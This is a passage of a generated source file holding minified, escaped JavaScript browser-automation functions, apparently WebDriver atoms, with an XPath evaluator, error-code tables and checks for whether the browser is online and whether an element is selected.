"eturn a;a=a.parentNode;c++}return null};function A(a){var b=null,c=a.no"\
"deType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerText:b,b=void"\
" 0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a."\
"documentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeTy"\
"pe&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c]."\
"nextSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction C(a,b,c){if"\
"(null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){return!1}re"\
"turn null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}function D(a,b,"\
"c,d,e){return E.call(null,a,b,k(c)?c:null,k(d)?d:null,e||new F)}\nfunct"\
"ion E(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.getElementsBy"\
"Name(d),p(b,function(b){a.matches(b)&&e.add(b)})):b.getElementsByClassN"\
"ame&&d&&\"class\"==c?(b=b.getElementsByClassName(d),p(b,function(b){b.c"\
"lassName==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.get"\
"ElementsByTagName(a.getName()),p(b,function(a){C(a,c,d)&&e.add(a)}));re"\
"turn e}function G(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)C(b,c"\
",d)&&a.matches(b)&&e.add(b);return e};function F(){this.d=this.c=null;t"\
"his.g=0}function H(a){this.k=a;this.next=this.i=null}F.prototype.unshif"\
"t=function(a){a=new H(a);a.next=this.c;this.d?this.c.i=a:this.c=this.d="\
"a;this.c=a;this.g++};F.prototype.add=function(a){a=new H(a);a.i=this.d;"\
"this.c?this.d.next=a:this.c=this.d=a;this.d=a;this.g++};function I(a){r"\
"eturn(a=a.c)?a.k:null}function J(a){return new K(a,!1)}function K(a,b){"\
"this.B=a;this.j=(this.l=b)?a.d:a.c;this.o=null}\nK.prototype.next=funct"\
"ion(){var a=this.j;if(null==a)return null;var b=this.o=a;this.j=this.l?"\
"a.i:a.next;return b.k};function L(a,b,c,d,e){b=b.evaluate(d);c=c.evalua"\
"te(d);var f;if(b instanceof F&&c instanceof F){e=J(b);for(d=e.next();d;"\
"d=e.next())for(b=J(c),f=b.next();f;f=b.next())if(a(A(d),A(f)))return!0;"\
"return!1}if(b instanceof F||c instanceof F){b instanceof F?e=b:(e=c,c=b"\
");e=J(e);b=typeof c;for(d=e.next();d;d=e.next()){switch(b){case \"numbe"\
"r\":d=+A(d);break;case \"boolean\":d=!!A(d);break;case \"string\":d=A(d"\
");break;default:throw Error(\"Illegal primitive type for comparison.\")"\
";}if(a(d,c))return!0}return!1}return e?\n\"boolean\"==typeof b||\"boole"\
"an\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a("\
"+b,+c):a(b,c):a(+b,+c)}function M(a,b,c,d){this.p=a;this.D=b;this.m=c;t"\
"his.n=d}M.prototype.toString=function(){return this.p};var N={};functio"\
"n O(a,b,c,d){if(a in N)throw Error(\"Binary operator already created: "\
"\"+a);a=new M(a,b,c,d);N[a.toString()]=a}O(\"div\",6,1,function(a,b,c){"\
"return a.b(c)/b.b(c)});O(\"mod\",6,1,function(a,b,c){return a.b(c)%b.b("\
"c)});O(\"*\",6,1,function(a,b,c){return a.b(c)*b.b(c)});\nO(\"+\",5,1,f"\
"unction(a,b,c){return a.b(c)+b.b(c)});O(\"-\",5,1,function(a,b,c){retur"\
"n a.b(c)-b.b(c)});O(\"<\",4,2,function(a,b,c){return L(function(a,b){re"\
"turn a<b},a,b,c)});O(\">\",4,2,function(a,b,c){return L(function(a,b){r"\
"eturn a>b},a,b,c)});O(\"<=\",4,2,function(a,b,c){return L(function(a,b)"\
"{return a<=b},a,b,c)});O(\">=\",4,2,function(a,b,c){return L(function(a"\
",b){return a>=b},a,b,c)});O(\"=\",3,2,function(a,b,c){return L(function"\
"(a,b){return a==b},a,b,c,!0)});\nO(\"!=\",3,2,function(a,b,c){return L("\
"function(a,b){return a!=b},a,b,c,!0)});O(\"and\",2,2,function(a,b,c){re"\
"turn a.f(c)&&b.f(c)});O(\"or\",1,2,function(a,b,c){return a.f(c)||b.f(c"\
")});function P(a,b,c,d,e,f,n,t,v){this.h=a;this.m=b;this.A=c;this.w=d;t"\
"his.v=e;this.n=f;this.u=n;this.t=void 0!==t?t:n;this.C=!!v}P.prototype."\
"toString=function(){return this.h};var Q={};function R(a,b,c,d,e,f,n,t)"\
"{if(a in Q)throw Error(\"Function already created: \"+a+\".\");Q[a]=new"\
" P(a,b,c,d,!1,e,f,n,t)}R(\"boolean\",2,!1,!1,function(a,b){return b.f(a"\
")},1);R(\"ceiling\",1,!1,!1,function(a,b){return Math.ceil(b.b(a))},1);"\
"\nR(\"concat\",3,!1,!1,function(a,b){var c=r(arguments,1);return q(c,fu"\
"nction(b,c){return b+c.a(a)})},2,null);R(\"contains\",2,!1,!1,function("\
"a,b,c){b=b.a(a);a=c.a(a);return-1!=b.indexOf(a)},2);R(\"count\",1,!1,!1"\
",function(a,b){return b.evaluate(a).g},1,1,!0);R(\"false\",2,!1,!1,g(!1"\
"),0);R(\"floor\",1,!1,!1,function(a,b){return Math.floor(b.b(a))},1);\n"\
"R(\"id\",4,!1,!1,function(a,b){var c=a.e(),d=9==c.nodeType?c:c.ownerDoc"\
"ument,c=b.a(a).split(/\\s+/),e=[];p(c,function(a){a=d.getElementById(a)"\
";!a||0<=m(e,a)||e.push(a)});e.sort(w);var f=new F;p(e,function(a){f.add"\
"(a)});return f},1);R(\"lang\",2,!1,!1,g(!1),1);R(\"last\",1,!0,!1,funct"\
"ion(a){if(1!=arguments.length)throw Error(\"Function last expects ()\")"\
";return a.r()},0);R(\"local-name\",3,!1,!0,function(a,b){var c=b?I(b.ev"\
"aluate(a)):a.e();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);\nR(\""\
"name\",3,!1,!0,function(a,b){var c=b?I(b.evaluate(a)):a.e();return c?c."\
"nodeName.toLowerCase():\"\"},0,1,!0);R(\"namespace-uri\",3,!0,!1,g(\"\""\
"),0,1,!0);R(\"normalize-space\",3,!1,!0,function(a,b){return(b?b.a(a):A"\
"(a.e())).replace(/[\\s\\xa0]+/g,\" \").replace(/^\\s+|\\s+$/g,\"\")},0,"\
"1);R(\"not\",2,!1,!1,function(a,b){return!b.f(a)},1);R(\"number\",1,!1,"\
"!0,function(a,b){return b?b.b(a):+A(a.e())},0,1);R(\"position\",1,!0,!1"\
",function(a){return a.s()},0);R(\"round\",1,!1,!1,function(a,b){return "\
"Math.round(b.b(a))},1);\nR(\"starts-with\",2,!1,!1,function(a,b,c){b=b."\
"a(a);a=c.a(a);return 0==b.lastIndexOf(a,0)},2);R(\"string\",3,!1,!0,fun"\
"ction(a,b){return b?b.a(a):A(a.e())},0,1);R(\"string-length\",1,!1,!0,f"\
"unction(a,b){return(b?b.a(a):A(a.e())).length},0,1);\nR(\"substring\",3"\
",!1,!1,function(a,b,c,d){c=c.b(a);if(isNaN(c)||Infinity==c||-Infinity=="\
"c)return\"\";d=d?d.b(a):Infinity;if(isNaN(d)||-Infinity===d)return\"\";"\
"c=Math.round(c)-1;var e=Math.max(c,0);a=b.a(a);if(Infinity==d)return a."\
"substring(e);b=Math.round(d);return a.substring(e,c+b)},2,3);R(\"substr"\
"ing-after\",3,!1,!1,function(a,b,c){b=b.a(a);a=c.a(a);c=b.indexOf(a);re"\
"turn-1==c?\"\":b.substring(c+a.length)},2);\nR(\"substring-before\",3,!"\
"1,!1,function(a,b,c){b=b.a(a);a=c.a(a);a=b.indexOf(a);return-1==a?\"\":"\
"b.substring(0,a)},2);R(\"sum\",1,!1,!1,function(a,b){for(var c=J(b.eval"\
"uate(a)),d=0,e=c.next();e;e=c.next())d+=+A(e);return d},1,1,!0);R(\"tra"\
"nslate\",3,!1,!1,function(a,b,c,d){b=b.a(a);c=c.a(a);var e=d.a(a);a=[];"\
"for(d=0;d<c.length;d++){var f=c.charAt(d);f in a||(a[f]=e.charAt(d))}c="\
"\"\";for(d=0;d<b.length;d++)f=b.charAt(d),c+=f in a?a[f]:f;return c},3)"\
";R(\"true\",2,!1,!1,g(!0),0);function S(a,b,c,d){this.h=a;this.q=b;this"\
".l=c;this.F=d}S.prototype.toString=function(){return this.h};var T={};f"\
"unction U(a,b,c,d){if(a in T)throw Error(\"Axis already created: \"+a);"\
"T[a]=new S(a,b,c,!!d)}U(\"ancestor\",function(a,b){for(var c=new F,d=b;"\
"d=d.parentNode;)a.matches(d)&&c.unshift(d);return c},!0);U(\"ancestor-o"\
"r-self\",function(a,b){var c=new F,d=b;do a.matches(d)&&c.unshift(d);wh"\
"ile(d=d.parentNode);return c},!0);\nU(\"attribute\",function(a,b){var c"\
"=new F,d=a.getName(),e=b.attributes;if(e)if(\"*\"==d)for(var d=0,f;f=e["\
"d];d++)c.add(f);else(f=e.getNamedItem(d))&&c.add(f);return c},!1);U(\"c"\
"hild\",function(a,b,c,d,e){return G.call(null,a,b,k(c)?c:null,k(d)?d:nu"\
"ll,e||new F)},!1,!0);U(\"descendant\",D,!1,!0);U(\"descendant-or-self\""\
",function(a,b,c,d){var e=new F;C(b,c,d)&&a.matches(b)&&e.add(b);return "\
"D(a,b,c,d,e)},!1,!0);\nU(\"following\",function(a,b,c,d){var e=new F;do"\
" for(var f=b;f=f.nextSibling;)C(f,c,d)&&a.matches(f)&&e.add(f),e=D(a,f,"\
"c,d,e);while(b=b.parentNode);return e},!1,!0);U(\"following-sibling\",f"\
"unction(a,b){for(var c=new F,d=b;d=d.nextSibling;)a.matches(d)&&c.add(d"\
");return c},!1);U(\"namespace\",function(){return new F},!1);U(\"parent"\
"\",function(a,b){var c=new F;if(9==b.nodeType)return c;if(2==b.nodeType"\
")return c.add(b.ownerElement),c;var d=b.parentNode;a.matches(d)&&c.add("\
"d);return c},!1);\nU(\"preceding\",function(a,b,c,d){var e=new F,f=[];d"\
"o f.unshift(b);while(b=b.parentNode);for(var n=1,t=f.length;n<t;n++){va"\
"r v=[];for(b=f[n];b=b.previousSibling;)v.unshift(b);for(var B=0,aa=v.le"\
"ngth;B<aa;B++)b=v[B],C(b,c,d)&&a.matches(b)&&e.add(b),e=D(a,b,c,d,e)}re"\
"turn e},!0,!0);U(\"preceding-sibling\",function(a,b){for(var c=new F,d="\
"b;d=d.previousSibling;)a.matches(d)&&c.unshift(d);return c},!0);U(\"sel"\
"f\",function(a,b){var c=new F;a.matches(b)&&c.add(b);return c},!1);func"\
"tion V(a,b){return!!a&&1==a.nodeType&&(!b||a.tagName.toUpperCase()==b)}"\
"var ba=\"BUTTON INPUT OPTGROUP OPTION SELECT TEXTAREA\".split(\" \");\n"\
"function W(a){var b=a.tagName.toUpperCase();return 0<=m(ba,b)?a.disable"\
"d?!1:a.parentNode&&1==a.parentNode.nodeType&&\"OPTGROUP\"==b||\"OPTION"\
"\"==b?W(a.parentNode):!z(a,function(a){var b=a.parentNode;if(b&&V(b,\"F"\
"IELDSET\")&&b.disabled){if(!V(a,\"LEGEND\"))return!0;for(;a=void 0!=a.p"\
"reviousElementSibling?a.previousElementSibling:s(a.previousSibling);)if"\
"(V(a,\"LEGEND\"))return!0}return!1}):!0};var X=W,Y=[\"_\"],Z=h;Y[0]in Z"\
"||!Z.execScript||Z.execScript(\"var \"+Y[0]);for(var $;Y.length&&($=Y.s"\
"hift());)Y.length||void 0===X?Z=Z[$]?Z[$]:Z[$]={}:Z[$]=X;; return this."\
"_.apply(null,arguments);}.apply({navigator:typeof window!=undefined?win"\
"dow.navigator:null,document:typeof window!=undefined?window.document:nu"\
"ll}, arguments);}"
IS_ONLINE = \
"function(){return function(){var a=window;function c(e,h){this.code=e;t"\
"his.state=d[e]||f;this.message=h||\"\";var b=this.state.replace(/((?:^|"\
"\\s+)[a-z])/g,function(b){return b.toUpperCase().replace(/^[\\s\\xa0]+/"\
"g,\"\")}),l=b.length-5;if(0>l||b.indexOf(\"Error\",l)!=l)b+=\"Error\";t"\
"his.name=b;b=Error(this.message);b.name=this.name;this.stack=b.stack||"\
"\"\"}(function(){var e=Error;function h(){}h.prototype=e.prototype;c.a="\
"e.prototype;c.prototype=new h})();\nvar f=\"unknown error\",d={15:\"ele"\
"ment not selectable\",11:\"element not visible\",31:\"ime engine activa"\
"tion failed\",30:\"ime not available\",24:\"invalid cookie domain\",29:"\
"\"invalid element coordinates\",12:\"invalid element state\",32:\"inval"\
"id selector\",51:\"invalid selector\",52:\"invalid selector\",17:\"java"\
"script error\",405:\"unsupported operation\",34:\"move target out of bo"\
"unds\",27:\"no such alert\",7:\"no such element\",8:\"no such frame\",2"\
"3:\"no such window\",28:\"script timeout\",33:\"session not created\",1"\
"0:\"stale element reference\",\n0:\"success\",21:\"timeout\",25:\"unabl"\
"e to set cookie\",26:\"unexpected alert open\"};d[13]=f;d[9]=\"unknown "\
"command\";c.prototype.toString=function(){return this.name+\": \"+this."\
"message};var g=this.navigator;var k=-1!=(g&&g.platform||\"\").indexOf("\
"\"Win\")&&!1;\nfunction m(){switch(\"browser_connection\"){case \"appca"\
"che\":return null!=a.applicationCache;case \"browser_connection\":retur"\
"n null!=a.navigator&&null!=a.navigator.onLine;case \"database\":return "\
"null!=a.openDatabase;case \"location\":return k?!1:null!=a.navigator&&n"\
"ull!=a.navigator.geolocation;case \"local_storage\":return null!=a.loca"\
"lStorage;case \"session_storage\":return null!=a.sessionStorage&&null!="\
"a.sessionStorage.clear;default:throw new c(13,\"Unsupported API identif"\
"ier provided as parameter\");}};function n(){if(m())return a.navigator."\
"onLine;throw new c(13,\"Undefined browser connection state\");}var p=["\
"\"_\"],q=this;p[0]in q||!q.execScript||q.execScript(\"var \"+p[0]);for("\
"var r;p.length&&(r=p.shift());)p.length||void 0===n?q=q[r]?q[r]:q[r]={}"\
":q[r]=n;; return this._.apply(null,arguments);}.apply({navigator:typeof"\
" window!=undefined?window.navigator:null,document:typeof window!=undefi"\
"ned?window.document:null}, arguments);}"
IS_SELECTED = \
"function(){return function(){function e(a){return function(){return a}}"\
"var h=this;function k(a){return\"string\"==typeof a};var l=Array.protot"\
"ype;function m(a,b){for(var c=a.length,d=k(a)?a.split(\"\"):a,f=0;f<c;f"\
"++)f in d&&b.call(void 0,d[f],f,a)}function aa(a,b){if(a.reduce)return "\
"a.reduce(b,\"\");var c=\"\";m(a,function(d,f){c=b.call(void 0,c,d,f,a)}"\
");return c}function ba(a,b,c){return 2>=arguments.length?l.slice.call(a"\
",b):l.slice.call(a,b,c)};function n(a,b){this.code=a;this.state=q[a]||r"\
";this.message=b||\"\";var c=this.state.replace(/((?:^|\\s+)[a-z])/g,fun"\
"ction(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/g,\"\")}),d=c.len"\
"gth-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";this.name=c;c=Erro"\
"r(this.message);c.name=this.name;this.stack=c.stack||\"\"}(function(){v"\
"ar a=Error;function b(){}b.prototype=a.prototype;n.N=a.prototype;n.prot"\
"otype=new b})();\nvar r=\"unknown error\",q={15:\"element not selectabl"\
"e\",11:\"element not visible\",31:\"ime engine activation failed\",30:"\
"\"ime not available\",24:\"invalid cookie domain\",29:\"invalid element"\
" coordinates\",12:\"invalid element state\",32:\"invalid selector\",51:"\
"\"invalid selector\",52:\"invalid selector\",17:\"javascript error\",40"\
"5:\"unsupported operation\",34:\"move target out of bounds\",27:\"no su"\
"ch alert\",7:\"no such element\",8:\"no such frame\",23:\"no such windo"\
"w\",28:\"script timeout\",33:\"session not created\",10:\"stale element"\
" reference\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie\""\
",26:\"unexpected alert open\"};q[13]=r;q[9]=\"unknown command\";n.proto"\
"type.toString=function(){return this.name+\": \"+this.message};var s,t,"\
"u,w=h.navigator;u=w&&w.platform||\"\";s=-1!=u.indexOf(\"Mac\");t=-1!=u."\
"indexOf(\"Win\");var x=-1!=u.indexOf(\"Linux\");function z(a,b){if(a.co"\
"ntains&&1==b.nodeType)return a==b||a.contains(b);if(\"undefined\"!=type"\
"of a.compareDocumentPosition)return a==b||Boolean(a.compareDocumentPosi"\
"tion(b)&16);for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction ca(a,b)"\
"{if(a==b)return 0;if(a.compareDocumentPosition)return a.compareDocument"\
"Position(b)&2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex"\
"\"in a.parentNode){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a"\
".sourceIndex-b.sourceIndex;var f=a.parentNode,g=b.parentNode;return f=="\
"g?A(a,b):!c&&z(f,b)?-1*B(a,b):!d&&z(g,a)?B(b,a):(c?a.sourceIndex:f.sour"\
"ceIndex)-(d?b.sourceIndex:g.sourceIndex)}d=9==a.nodeType?a:a.ownerDocum"\
"ent||a.document;c=d.createRange();c.selectNode(a);c.collapse(!0);\nd=d."\
"createRange();d.selectNode(b);d.collapse(!0);return c.compareBoundaryPo"\
"ints(h.Range.START_TO_END,d)}function B(a,b){var c=a.parentNode;if(c==b"\
")return-1;for(var d=b;d.parentNode!=c;)d=d.parentNode;return A(d,a)}fun"\
"ction A(a,b){for(var c=b;c=c.previousSibling;)if(c==a)return-1;return 1"\
"};function C(a){var b=null,c=a.nodeType;1==c&&(b=a.textContent,b=void 0"\
"==b||null==b?a.innerText:b,b=void 0==b||null==b?\"\":b);if(\"string\"!="\
"typeof b)if(9==c||1==c){a=9==c?a.documentElement:a.firstChild;for(var c"\
"=0,d=[],b=\"\";a;){do 1!=a.nodeType&&(b+=a.nodeValue),d[c++]=a;while(a="\
"a.firstChild);for(;c&&!(a=d[--c].nextSibling););}}else b=a.nodeValue;re"\
"turn\"\"+b}\nfunction D(a,b,c){if(null===b)return!0;try{if(!a.getAttrib"\
"ute)return!1}catch(d){return!1}return null==c?!!a.getAttribute(b):a.get"\
"Attribute(b,2)==c}function E(a,b,c,d,f){return da.call(null,a,b,k(c)?c:"\
"null,k(d)?d:null,f||new F)}\nfunction da(a,b,c,d,f){b.getElementsByName"\
"&&d&&\"name\"==c?(b=b.getElementsByName(d),m(b,function(b){a.matches(b)"\
"&&f.add(b)})):b.getElementsByClassName&&d&&\"class\"==c?(b=b.getElement"\
"sByClassName(d),m(b,function(b){b.className==d&&a.matches(b)&&f.add(b)}"\
")):b.getElementsByTagName&&(b=b.getElementsByTagName(a.getName()),m(b,f"\
"unction(a){D(a,c,d)&&f.add(a)}));return f}function ea(a,b,c,d,f){for(b="\
"b.firstChild;b;b=b.nextSibling)D(b,c,d)&&a.matches(b)&&f.add(b);return "\
"f};function F(){this.g=this.f=null;this.l=0}function G(a){this.p=a;this"\
".next=this.n=null}F.prototype.unshift=function(a){a=new G(a);a.next=thi"\
"s.f;this.g?this.f.n=a:this.f=this.g=a;this.f=a;this.l++};F.prototype.ad"\
"d=function(a){a=new G(a);a.n=this.g;this.f?this.g.next=a:this.f=this.g="\
"a;this.g=a;this.l++};function H(a){return(a=a.f)?a.p:null}function I(a)"\
"{return new J(a,!1)}function J(a,b){this.J=a;this.o=(this.q=b)?a.g:a.f;"\
"this.u=null}\nJ.prototype.next=function(){var a=this.o;if(null==a)retur"\
"n null;var b=this.u=a;this.o=this.q?a.n:a.next;return b.p};function K(a"\
",b,c,d,f){b=b.evaluate(d);c=c.evaluate(d);var g;if(b instanceof F&&c in"\
"stanceof F){f=I(b);for(d=f.next();d;d=f.next())for(b=I(c),g=b.next();g;"\
"g=b.next())if(a(C(d),C(g)))return!0;return!1}if(b instanceof F||c insta"\
"nceof F){b instanceof F?f=b:(f=c,c=b);f=I(f);b=typeof c;for(d=f.next();"\
"d;d=f.next()){switch(b){case \"number\":d=+C(d);break;case \"boolean\":"\
"d=!!C(d);break;case \"string\":d=C(d);break;default:throw Error(\"Illeg"\
"al primitive type for comparison.\");}if(a(d,c))return!0}return!1}retur"\
"n f?\n\"boolean\"==typeof b||\"boolean\"==typeof c?a(!!b,!!c):\"number"\
"\"==typeof b||\"number\"==typeof c?a(+b,+c):a(b,c):a(+b,+c)}function M("\
"a,b,c,d){this.v=a;this.L=b;this.s=c;this.t=d}M.prototype.toString=funct"\
"ion(){return this.v};var N={};function O(a,b,c,d){if(a in N)throw Error"\
"(\"Binary operator already created: \"+a);a=new M(a,b,c,d);N[a.toString"\
"()]=a}O(\"div\",6,1,function(a,b,c){return a.d(c)/b.d(c)});O(\"mod\",6,"\
"1,function(a,b,c){return a.d(c)%b.d(c)});O(\"*\",6,1,function(a,b,c){re"\
"turn a.d(c)*b.d(c)});\nO(\"+\",5,1,function(a,b,c){return a.d(c)+b.d(c)"\
"});O(\"-\",5,1,function(a,b,c){return a.d(c)-b.d(c)});O(\"<\",4,2,funct"\
"ion(a,b,c){return K(function(a,b){return a<b},a,b,c)});O(\">\",4,2,func"\
"tion(a,b,c){return K(function(a,b){return a>b},a,b,c)});O(\"<=\",4,2,fu"\
"nction(a,b,c){return K(function(a,b){return a<=b},a,b,c)});O(\">=\",4,2"\
",function(a,b,c){return K(function(a,b){return a>=b},a,b,c)});O(\"=\",3"\
",2,function(a,b,c){return K(function(a,b){return a==b},a,b,c,!0)});\nO("\
"\"!=\",3,2,function(a,b,c){return K(function(a,b){return a!=b},a,b,c,!0"\
")});O(\"and\",2,2,function(a,b,c){return a.j(c)&&b.j(c)});O(\"or\",1,2,"\
"function(a,b,c){return a.j(c)||b.j(c)});function P(a,b,c,d,f,g,p,v,y){t"\
"his.m=a;this.s=b;this.I=c;this.H=d;this.G=f;this.t=g;this.F=p;this.D=vo"\
"id 0!==v?v:p;this.K=!!y}P.prototype.toString=function(){return this.m};"\
"var Q={};function R(a,b,c,d,f,g,p,v){if(a in Q)throw Error(\"Function a"\
"lready created: \"+a+\".\");Q[a]=new P(a,b,c,d,!1,f,g,p,v)}R(\"boolean"\
"\",2,!1,!1,function(a,b){return b.j(a)},1);R(\"ceiling\",1,!1,!1,functi"\
"on(a,b){return Math.ceil(b.d(a))},1);\nR(\"concat\",3,!1,!1,function(a,"\
"b){var c=ba(arguments,1);return aa(c,function(b,c){return b+c.c(a)})},2"\
",null);R(\"contains\",2,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);return-"\
"1!=b.indexOf(a)},2);R(\"count\",1,!1,!1,function(a,b){return b.evaluate"\
"(a).l},1,1,!0);R(\"false\",2,!1,!1,e(!1),0);R(\"floor\",1,!1,!1,functio"\
"n(a,b){return Math.floor(b.d(a))},1);\nR(\"id\",4,!1,!1,function(a,b){v"\
"ar c=a.h(),d=9==c.nodeType?c:c.ownerDocument,c=b.c(a).split(/\\s+/),f=["\
"];m(c,function(a){a=d.getElementById(a);var b;if(!(b=!a)){a:if(k(f))b=k"\
"(a)&&1==a.length?f.indexOf(a,0):-1;else{for(b=0;b<f.length;b++)if(b in "\
"f&&f[b]===a)break a;b=-1}b=0<=b}b||f.push(a)});f.sort(ca);var g=new F;m"\
"(f,function(a){g.add(a)});return g},1);R(\"lang\",2,!1,!1,e(!1),1);R(\""\
"last\",1,!0,!1,function(a){if(1!=arguments.length)throw Error(\"Functio"\
"n last expects ()\");return a.B()},0);\nR(\"local-name\",3,!1,!0,functi"\
"on(a,b){var c=b?H(b.evaluate(a)):a.h();return c?c.nodeName.toLowerCase("\
"):\"\"},0,1,!0);R(\"name\",3,!1,!0,function(a,b){var c=b?H(b.evaluate(a"\
")):a.h();return c?c.nodeName.toLowerCase():\"\"},0,1,!0);R(\"namespace-"\
"uri\",3,!0,!1,e(\"\"),0,1,!0);R(\"normalize-space\",3,!1,!0,function(a,"\
"b){return(b?b.c(a):C(a.h())).replace(/[\\s\\xa0]+/g,\" \").replace(/^"\
"\\s+|\\s+$/g,\"\")},0,1);R(\"not\",2,!1,!1,function(a,b){return!b.j(a)}"\
",1);R(\"number\",1,!1,!0,function(a,b){return b?b.d(a):+C(a.h())},0,1);"\
"\nR(\"position\",1,!0,!1,function(a){return a.C()},0);R(\"round\",1,!1,"\
"!1,function(a,b){return Math.round(b.d(a))},1);R(\"starts-with\",2,!1,!"\
"1,function(a,b,c){b=b.c(a);a=c.c(a);return 0==b.lastIndexOf(a,0)},2);R("\
"\"string\",3,!1,!0,function(a,b){return b?b.c(a):C(a.h())},0,1);R(\"str"\
"ing-length\",1,!1,!0,function(a,b){return(b?b.c(a):C(a.h())).length},0,"\
"1);\nR(\"substring\",3,!1,!1,function(a,b,c,d){c=c.d(a);if(isNaN(c)||In"\
"finity==c||-Infinity==c)return\"\";d=d?d.d(a):Infinity;if(isNaN(d)||-In"\
"finity===d)return\"\";c=Math.round(c)-1;var f=Math.max(c,0);a=b.c(a);if"\
"(Infinity==d)return a.substring(f);b=Math.round(d);return a.substring(f"\
",c+b)},2,3);R(\"substring-after\",3,!1,!1,function(a,b,c){b=b.c(a);a=c."\
"c(a);c=b.indexOf(a);return-1==c?\"\":b.substring(c+a.length)},2);\nR(\""\
"substring-before\",3,!1,!1,function(a,b,c){b=b.c(a);a=c.c(a);a=b.indexO"\
"f(a);return-1==a?\"\":b.substring(0,a)},2);R(\"sum\",1,!1,!1,function(a"\
",b){for(var c=I(b.evaluate(a)),d=0,f=c.next();f;f=c.next())d+=+C(f);ret"\
"urn d},1,1,!0);R(\"translate\",3,!1,!1,function(a,b,c,d){b=b.c(a);c=c.c"\
"(a);var f=d.c(a);a=[];for(d=0;d<c.length;d++){var g=c.charAt(d);g in a|"\
"|(a[g]=f.charAt(d))}c=\"\";for(d=0;d<b.length;d++)g=b.charAt(d),c+=g in"\
" a?a[g]:g;return c},3);R(\"true\",2,!1,!1,e(!0),0);function S(a,b,c,d){"\
"this.m=a;this.A=b;this.q=c;this.O=d}S.prototype.toString=function(){ret"\
"urn this.m};var fa={};function T(a,b,c,d){if(a in fa)throw Error(\"Axis"\
" already created: \"+a);fa[a]=new S(a,b,c,!!d)}T(\"ancestor\",function("\
"a,b){for(var c=new F,d=b;d=d.parentNode;)a.matches(d)&&c.unshift(d);ret"\
"urn c},!0);T(\"ancestor-or-self\",function(a,b){var c=new F,d=b;do a.ma"\
"tches(d)&&c.unshift(d);while(d=d.parentNode);return c},!0);\nT(\"attrib"\
"ute\",function(a,b){var c=new F,d=a.getName(),f=b.attributes;if(f)if(\""\
"*\"==d)for(var d=0,g;g=f[d];d++)c.add(g);else(g=f.getNamedItem(d))&&c.a"\
"dd(g);return c},!1);T(\"child\",function(a,b,c,d,f){return ea.call(null"\
",a,b,k(c)?c:null,k(d)?d:null,f||new F)},!1,!0);T(\"descendant\",E,!1,!0"\
");T(\"descendant-or-self\",function(a,b,c,d){var f=new F;D(b,c,d)&&a.ma"\
"tches(b)&&f.add(b);return E(a,b,c,d,f)},!1,!0);\nT(\"following\",functi"\
"on(a,b,c,d){var f=new F;do for(var g=b;g=g.nextSibling;)D(g,c,d)&&a.mat"\
"ches(g)&&f.add(g),f=E(a,g,c,d,f);while(b=b.parentNode);return f},!1,!0)"\
";T(\"following-sibling\",function(a,b){for(var c=new F,d=b;d=d.nextSibl"\
"ing;)a.matches(d)&&c.add(d);return c},!1);T(\"namespace\",function(){re"\
"turn new F},!1);T(\"parent\",function(a,b){var c=new F;if(9==b.nodeType"\
")return c;if(2==b.nodeType)return c.add(b.ownerElement),c;var d=b.paren"\
"tNode;a.matches(d)&&c.add(d);return c},!1);\nT(\"preceding\",function(a"\
",b,c,d){var f=new F,g=[];do g.unshift(b);while(b=b.parentNode);for(var "\
"p=1,v=g.length;p<v;p++){var y=[];for(b=g[p];b=b.previousSibling;)y.unsh"\
"ift(b);for(var L=0,ka=y.length;L<ka;L++)b=y[L],D(b,c,d)&&a.matches(b)&&"\
"f.add(b),f=E(a,b,c,d,f)}return f},!0,!0);T(\"preceding-sibling\",functi"\
"on(a,b){for(var c=new F,d=b;d=d.previousSibling;)a.matches(d)&&c.unshif"\
"t(d);return c},!0);T(\"self\",function(a,b){var c=new F;a.matches(b)&&c"\
".add(b);return c},!1);function ga(a){return a&&1==a.nodeType&&\"OPTION"\
"\"==a.tagName.toUpperCase()?!0:a&&1==a.nodeType&&\"INPUT\"==a.tagName.t"\
"oUpperCase()?(a=a.type.toLowerCase(),\"checkbox\"==a||\"radio\"==a):!1}"\
";function U(a,b){this.i={};this.e=[];var c=arguments.length;if(1<c){if("\
"c%2)throw Error(\"Uneven number of arguments\");for(var d=0;d<c;d+=2)th"\
"is.set(arguments[d],arguments[d+1])}else if(a){var f;if(a instanceof U)"\
"for(d=ha(a),ia(a),f=[],c=0;c<a.e.length;c++)f.push(a.i[a.e[c]]);else{va"\
"r c=[],g=0;for(d in a)c[g++]=d;d=c;c=[];g=0;for(f in a)c[g++]=a[f];f=c}"\
"for(c=0;c<d.length;c++)this.set(d[c],f[c])}}U.prototype.k=0;U.prototype"\
".w=0;function ha(a){ia(a);return a.e.concat()}\nfunction ia(a){if(a.k!="\
"a.e.length){for(var b=0,c=0;b<a.e.length;){var d=a.e[b];Object.prototyp"\
"e.hasOwnProperty.call(a.i,d)&&(a.e[c++]=d);b++}a.e.length=c}if(a.k!=a.e"\
".length){for(var f={},c=b=0;b<a.e.length;)d=a.e[b],Object.prototype.has"\
"OwnProperty.call(f,d)||(a.e[c++]=d,f[d]=1),b++;a.e.length=c}}U.prototyp"\
"e.get=function(a,b){return Object.prototype.hasOwnProperty.call(this.i,"\
"a)?this.i[a]:b};\nU.prototype.set=function(a,b){Object.prototype.hasOwn"\
"Property.call(this.i,a)||(this.k++,this.e.push(a),this.w++);this.i[a]=b"\
"};var V={};function W(a,b,c){var d=typeof a;(\"object\"==d&&null!=a||\""\
"function\"==d)&&(a=a.a);a=new ja(a,b,c);!b||b in V&&!c||(V[b]={key:a,sh"\
